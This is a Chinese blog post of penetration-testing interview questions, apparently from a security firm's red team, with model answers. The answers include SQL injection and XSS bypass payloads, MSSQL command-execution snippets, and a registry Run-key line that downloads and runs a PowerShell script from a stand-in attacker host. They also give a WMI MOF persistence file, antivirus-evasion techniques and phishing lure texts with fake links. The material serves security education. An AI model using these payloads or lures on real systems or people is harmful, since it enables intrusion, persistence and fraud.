2025年渗透测试面试题总结-奇安信z-team（题目+回答）-CSDN博客

奇安信z-team
1. mysql的udf的原理，默认有无plugin目录
2. mysql5.7版本udf不能执行命令怎么办
3. 注入时遇到了waf怎么绕过
4. xss中a标签里的href属性如果双引号被实体化转义了怎么利用
5. mssql中如果xp_cmdshell跟sp_configure都被禁用了怎么执行命令
6. mof提权
7. 有没有做过免杀
8. 正反向代理
9. 拿站的思路(主要是信息收集的手段)
10. 提权时用过那些漏洞
11. 打点后的横向移动思路
12. 平时有没有研究过新公开的一些漏洞
13. 钓鱼时的一些话术
1. MySQL UDF原理与默认plugin目录

原理：

UDF（用户自定义函数）允许通过动态链接库（DLL/SO）扩展MySQL功能，攻击者可编写恶意函数（如sys_exec）执行系统命令。
流程：
将编译好的UDF库（如lib_mysqludf_sys.so ）写入MySQL插件目录。
通过CREATE FUNCTION sys_exec RETURNS STRING SONAME 'udf.dll'; 注册函数。
调用SELECT sys_exec('whoami');执行命令。

默认plugin目录：

Linux：/usr/lib/mysql/plugin/（需secure_file_priv为空且MySQL用户有写入权限）。
Windows：C:\Program Files\MySQL\MySQL Server X.X\lib\plugin\（默认无写入权限，需提权）。

2. MySQL 5.7 UDF限制绕过

解决方案：

检查secure_file_priv：若限制为NULL，尝试修改配置文件或使用SELECT @@secure_file_priv;定位可写路径。
替代提权方式：
MOF提权：利用Windows管理规范（WMI）执行脚本。
日志文件写入WebShell：通过general_log将恶意代码写入网站目录。

手动编译UDF：针对MySQL 5.7架构重新编译UDF库（如raptor_udf2.c）。

3. 注入绕过WAF的方法

常用技术：

混淆与编码：
URL编码：%55nion代替Union。
注释符干扰：/*!UNION*/SELECT（MySQL特性）。

分块传输：利用HTTP分块编码拆分恶意Payload。
时间盲注绕过：通过SLEEP(1)等时间函数绕过正则检测。
参数污染：重复参数（?id=1&id=1' AND 1=1--）混淆WAF解析。

4. XSS中href属性双引号转义的利用

绕过方法：
无引号注入：<a href=javascript:alert(1)>（依赖浏览器容错）。
HTML实体二次解析：
html<a href="javascript:eval('alert&#40;1&#41;')"> 
伪协议与事件：
data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==
<a href="#" onmouseover=alert(1)>（利用事件触发）。
5. MSSQL命令执行绕过禁用xp_cmdshell

替代方案：
OLE自动化对象：
sqlDECLARE @shell INT; EXEC sp_oacreate 'WScript.Shell', @shell OUTPUT; EXEC sp_oamethod @shell, 'Run', NULL, 'cmd /c whoami'; 
CLR集成：上传恶意DLL并创建CLR存储过程。
PowerShell调用：
sqlEXEC xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run','payload','REG_SZ','powershell -c "IEX (New-Object Net.WebClient).DownloadString(''http://attacker/shell.ps1'')"'; 
6. MOF提权

原理：通过Windows管理规范（WMI）定时执行恶意代码。
步骤：
上传恶意MOF文件（如evil.mof ）至C:/Windows/system32/wbem/mof/。
MOF文件内容：
mof#pragma namespace("\\\\.\\root\\subscription") instance of __EventFilter as $Filter { EventNamespace = "Root\\Cimv2"; Name = "TestFilter"; Query = "SELECT * FROM __InstanceModificationEvent WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"; }; instance of CommandLineEventConsumer as $Consumer { Name = "TestConsumer"; CommandLineTemplate = "calc.exe"; }; instance of __FilterToConsumerBinding { Consumer = $Consumer; Filter = $Filter; }; 
系统自动编译执行，常用于Windows Server 2003/2008提权。
7. 免杀实践经验

技术分类：

静态免杀：
代码混淆：对Shellcode进行AES加密或XOR异或。
合法签名伪装：劫持白签名进程（如svchost.exe ）。

动态免杀：
进程注入：通过CreateRemoteThread注入到合法进程（如explorer.exe ）。
无文件攻击：内存加载PE文件（如PowerShell反射加载）。

8. 正反向代理区别

类型 正向代理 反向代理
角色代理客户端请求（隐藏客户端IP）代理服务端响应（隐藏服务器架构）
典型场景 突破访问限制（如翻墙）负载均衡、CDN加速
配置示例 用户手动设置代理服务器地址 Nginx配置proxy_pass到后端服务

9. 拿站信息收集手段

核心步骤：

子域名爆破：使用subfinder、amass结合证书透明度日志（CT Logs）。
端口扫描：masscan快速识别开放服务（如445、6379、8080）。
目录爆破：dirsearch探测敏感路径（/admin、/backup）。
指纹识别：Wappalyzer识别CMS（如Shiro、ThinkPHP）。
GitHub泄露：搜索目标公司代码仓库中的API密钥、配置文件。

10. 提权漏洞利用

常见漏洞：

Linux：Dirty Cow（CVE-2016-5195）、Polkit（CVE-2021-3560）。
Windows：Print Spooler（CVE-2021-1675）、AlwaysInstallElevated策略。
数据库：MySQL UDF提权、MSSQL xp_cmdshell滥用。

11. 横向移动思路

关键路径：

凭证窃取：通过Mimikatz抓取内存密码或Hash（Pass-the-Hash）。
漏洞扩散：利用内网漏洞（如SMB漏洞MS17-010）。
服务扫描：识别内网Redis、Jenkins、WebLogic等脆弱服务。
隐蔽隧道：使用DNS/ICMP隧道绕过流量监控。

12. 新漏洞跟踪与研究

跟踪渠道：

漏洞库：CVE、NVD、Exploit-DB。
社区：GitHub PoC仓库、Twitter安全研究员（如@pentest_swissky）。
实战复现：搭建漏洞环境（如Log4Shell）测试利用链。

13. 钓鱼话术设计

典型场景：

伪装通知：
“您的账户存在异常登录，请立即验证身份：http://fake.com/login ”

福利诱导：
“恭喜您获得年度员工奖励，点击领取：http://fake.com/reward ”

紧急威胁：
“系统检测到病毒攻击，请下载补丁：http://fake.com/patch.exe ”

内部文件：
“财务部最新预算表，请查收附件：budget.xls （含宏病毒）”。

类型	正向代理	反向代理
角色	代理客户端请求（隐藏客户端IP）	代理服务端响应（隐藏服务器架构）
典型场景	突破访问限制（如翻墙）	负载均衡、CDN加速
配置示例	用户手动设置代理服务器地址	Nginx配置`proxy_pass`到后端服务